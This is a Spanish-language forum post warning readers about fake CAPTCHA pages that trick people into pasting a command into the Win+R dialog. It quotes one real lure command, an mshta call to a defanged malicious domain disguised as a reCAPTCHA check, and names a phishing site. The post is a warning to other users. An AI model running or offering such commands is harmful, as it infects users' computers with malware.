Falsos Captcha de Win+R, cuidado

Regresé al foro para avisar que no tengan este problema. Debe ser un tema nuevo, ya que no lo veo en muchos foros ni nada, quizás haya gente que no sepa de esto. Estuve con un amigo cambiando nombres de dominios, y en eso reemplazo paypaL por paypai y le agrego un .me, y me redirige a la página oficial, pero, me pareció raro lo siguiente.

Dije, que raro, debe ser la primera vez que veo esto, y al intentar hacerlo de todas formas no pegaba nada (un captcha creo que OFICIAL de Cloudflare).

Al rato, empecé a investigar más a fondo, y se ve que gente cayó en este método, y entraron diferentes tipos de virus o troyanos a computadoras, con muy diferentes tipos de links o métodos de “verificación”. Tenían la mayoría el objetivo de ejecutar PowerShell, y algún que otro método para descargar un archivo de texto con el comando, descargar algún archivo o dejar sin acceso a internet al dispositivo.

Un ejemplo de comando que da es algo como esto: "mshta macphotoeditor[.]shop/singl5.mp4 # :white_check_mark: ''I am not a robot - reCAPTCHA Verification ID: 2165 "

También la página web “github-scanner[.]com” (obviamente, no ingreses), que automáticamente ya está reconocido como página fraude. En realidad, la página te la envían mediante un correo electrónico, mencionando que hubo un problema crítico en la cuenta de GitHub.

Solo quería mencionarles este tema. No se si gente ya lo conoce, si lo vió en algún momento, pero quiero compartir mi punto de vista. Un saludo!